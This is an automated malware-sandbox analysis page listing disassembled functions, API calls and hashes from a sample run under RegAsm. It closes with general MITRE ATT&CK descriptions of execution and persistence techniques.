Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kxl
API String ID: 1967447596-239246097
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 6416bc1c01f24207c94e788448da95706e92f6849a06973467900fae0c1e39c9
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 2FE026F1E101000A9B0898789E0DA2A75C99B182AB7844A35E822C2BC9FF14F670C191

Function 6C7A5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C7C51C8), ref: 6C7A591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C7A592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C7A5915

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 4128060ca1e76bdf04badbf196d73757091e1bbce18362a7995434148022b2d7
Instruction ID: 5f5361bd681b8576cae1a6650b9d38bbcb076c29bb8a449cca34442aee80aeb5
Opcode Fuzzy Hash: 4128060ca1e76bdf04badbf196d73757091e1bbce18362a7995434148022b2d7
Instruction Fuzzy Hash: 06E0DF30204642BFDB004BA8EA0C7457FF89B13779F108628F4A897AC1C3B2B9408396

Function 6C753850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C7CF860), ref: 6C75385C
ReleaseSRWLockExclusive.KERNEL32(6C7CF860,?), ref: 6C753871

Strings

,|l, xrefs: 6C75387A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,|l
API String ID: 17069307-607198438
Opcode ID: 423c30df9768f0f76be9e1968cf9f4a1033c2314f0177809dce00921686a415f
Instruction ID: 12a729b646546e87f714247a63c620d0187e17e9dc676315e9e9a4b5f8a78ce8
Opcode Fuzzy Hash: 423c30df9768f0f76be9e1968cf9f4a1033c2314f0177809dce00921686a415f
Instruction Fuzzy Hash: 04E0DF31A01A1F9F87019FA7860668A3BB8EE037A13448025F40917A10CB30F68086E6

Function 6C75BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C75BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C75BEF5

Strings

cryptbase.dll, xrefs: 6C75BEF0

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 9adc5c4bdb579b1e12d9dafc9ceeeb54e5e78286b1259ddf7030df8c12618924
Instruction ID: 1090979ce8b3029595abdc80fc6c977c1680b0e861160bd0d25729dd3c54f491
Opcode Fuzzy Hash: 9adc5c4bdb579b1e12d9dafc9ceeeb54e5e78286b1259ddf7030df8c12618924
Instruction Fuzzy Hash: 70D0C731384109EFD6416A908E05B35377CA701715F54C035F75554951CBB1B560DB55

Function 6C7450E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C744E9C,?,?,?,?,?), ref: 6C74510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C744E9C,?,?,?,?,?), ref: 6C745167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C745196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C744E9C), ref: 6C745234

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 8a35346a70f4307ee95777799196cea612822584af85442aadec98a136fac191
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 4291BD75601656CFCB14CF08D490A5ABBA2FF89358B28C699ED589B715D331FC42CBE0

Function 6C7808F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C780918
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C7809A6
EnterCriticalSection.KERNEL32(6C7CE7DC,?,00000000), ref: 6C7809F3
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C780ACB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f061b0f5ca770d518af459aa1e3b99c610adfe2ceecdfb06e98e90a7e79fe530
Instruction ID: 78544c40b93641201bdad7e00a124bac7b78237a6ae7abad5ab46f48a40afbd5
Opcode Fuzzy Hash: f061b0f5ca770d518af459aa1e3b99c610adfe2ceecdfb06e98e90a7e79fe530
Instruction Fuzzy Hash: 22515D3670355ACFEB089B25C64562533B5FB82B24B25413ADE6597F80DB30ED1187D1

Function 6C7A59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C77E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C7A5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C77E56A,?,|UrlbarCSSSpan), ref: 6C7A5A5C
free.MOZGLUE(?), ref: 6C7A5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C7A5B9D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 5220b54198566b175874643f8cbea8a292f547ba6086f01f882fe1d1e4d8d169
Instruction ID: b8ddec7168b4545f9f2876440ad1953df2c4dd5637396b2cf49bd5b03970869f
Opcode Fuzzy Hash: 5220b54198566b175874643f8cbea8a292f547ba6086f01f882fe1d1e4d8d169
Instruction Fuzzy Hash: 14519E706087409FD740CF68D9C471ABBE4FF89318F04CA6DE8889B642D774E945CB62

Function 6C79B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B628

Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C79B127,?,?,?,?,?,?,?,?), ref: 6C79B74D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 17fd36a3caba64a46c9ca976b5f224a634d1a608f76e93be242f2caa464b1f35
Instruction ID: 07a5247b59b7628f475f15d6641e4c6f1096e9198958d573abc469288fce4968
Opcode Fuzzy Hash: 17fd36a3caba64a46c9ca976b5f224a634d1a608f76e93be242f2caa464b1f35
Instruction Fuzzy Hash: AD51D071A01216CFDB24CF68EA8475EB7B5FF85304F45862EC85AAB701D731B804CBA1

Function 6C7523D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4845e8816e2428177509ff689b3bee0b2b853d9ff10e1a48b8a0f9788433b0c0
Instruction ID: 06d0106f07fb3aab78cac49f764b9271b6049654a37e49aaae2143746dd6d612
Opcode Fuzzy Hash: 4845e8816e2428177509ff689b3bee0b2b853d9ff10e1a48b8a0f9788433b0c0
Instruction Fuzzy Hash: 2B51A1B1A01206CFDB04CF18C9C8749BBB1BF48318F698279D8199B781DB71E9A1CF90

Function 6C79DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C78FF2A), ref: 6C79DFFD

Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C78FF2A), ref: 6C79E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C78FF2A), ref: 6C79E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C78FF2A), ref: 6C79E0FE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 1e1a70b3811dd97978b603025518695aefe713fffedfb144b30424676a382dbd
Instruction ID: aca9f8a30f2b52b4294a501925749cba16c39dc3b8ce2d2d653e73c8760b6f15
Opcode Fuzzy Hash: 1e1a70b3811dd97978b603025518695aefe713fffedfb144b30424676a382dbd
Instruction Fuzzy Hash: 2641D4B164420ACFEB14CF6CEA8035E77B2BB45308F284939D516DB741E731E944CBA2

Function 6C7A6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C7A61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C7A622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C7A6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A6292

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 53e686c522c1a3d396ea91602c804e9c0548844e45937702e5df5457f619cd57
Instruction ID: 5ccaebe7d96d8cb63b467716c301fcc41b49803d697df23b97a19f9a710f3c2a
Opcode Fuzzy Hash: 53e686c522c1a3d396ea91602c804e9c0548844e45937702e5df5457f619cd57
Instruction Fuzzy Hash: F9313971A0060A8FDB04CF6CDD806AA73E9FF55308F108239C55AD7692FB31E699C750

Function 6C796E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C796EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C796EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C796F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C796F5C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 9b5664a8a1e2d7853b45f299d7e00caa5bdae6b63ec92022c6b701defcba7275
Instruction ID: 625f8827d813ba1e2621973177503f232dab5af52f66c01a14d8f09507f01afc
Opcode Fuzzy Hash: 9b5664a8a1e2d7853b45f299d7e00caa5bdae6b63ec92022c6b701defcba7275
Instruction Fuzzy Hash: 7431E471A1060A8FDB44CF2CDE806AA73EAFB84344F548239D41AC7651EB31E659C7A0

Function 6C7AB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C750A4D), ref: 6C7AB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C750A4D), ref: 6C7AB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C750A4D), ref: 6C7AB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C750A4D), ref: 6C7AB67F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 4e15c90162785178e0cd61ad5f76a2a29df968ea5f3e1bc72366aa398bae6676
Instruction ID: 3dbc63f8d11e368b081126309cd503fdc54df15ad3578aa00ece628e95c9be41
Opcode Fuzzy Hash: 4e15c90162785178e0cd61ad5f76a2a29df968ea5f3e1bc72366aa398bae6676
Instruction Fuzzy Hash: A631D671A0121A8FDB10CFA8C94465AB7B5FF81305F1A8679D8069B211DB31F916CBA1

Function 6C75BBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C75BBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C75BC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6C75BC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75BCCE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: bd6b89065c9519ea28175472373996770197ca6f230db7cffcf4308f17dca46a
Instruction ID: 7cf7ce503fe226c8f26b8695078702198c01b67d8ac992049960d24ed5e33fc6
Opcode Fuzzy Hash: bd6b89065c9519ea28175472373996770197ca6f230db7cffcf4308f17dca46a
Instruction Fuzzy Hash: 9E212671B002054BF7008F39CD8563EB2E9EB81308FA44A39D956D6791EE70F5A483A5

Function 6C77F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C77F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C77F668

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 4366504716ec07e601f2c16806ffd7f92f7e02c55777bbb8d413dc7bbdd6f5c2
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 8A315171A00218AFCB24CF6DCEC4A9F77B5EF84354B148539FA498BB05D631E9448BA0

Function 6C75B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C75B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C75B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C75B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C75B9B9

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: d9826ff5b4506b40fd7077f32110db1bf2179fef006807f603d9d09a27b3827e
Instruction ID: 9717dbc0176f59820f1b6ad4289d85368f181720c866558d11d3ca114c24add0
Opcode Fuzzy Hash: d9826ff5b4506b40fd7077f32110db1bf2179fef006807f603d9d09a27b3827e
Instruction Fuzzy Hash: A3117FF1A002059FCB04DF69DC848ABBBF8BF88314B14853AE919D7701D731AA158AA1

Function 6C7926B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7926C1
free.MOZGLUE(?), ref: 6C7926E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7926FF
free.MOZGLUE ref: 6C79270D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 675b2bbd079b2b4b23b59d7e254f22e9aff0b9af06f46da207b669ea9abd53b5
Instruction ID: bd72a5f36fe8a9a07dd59226884663952004c678806d5d382c921bed521400e9
Opcode Fuzzy Hash: 675b2bbd079b2b4b23b59d7e254f22e9aff0b9af06f46da207b669ea9abd53b5
Instruction Fuzzy Hash: 3CF0A9B27012015BEB00AA19FD8895773ADFF51359B540035EA16D7F02E731F959C6A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

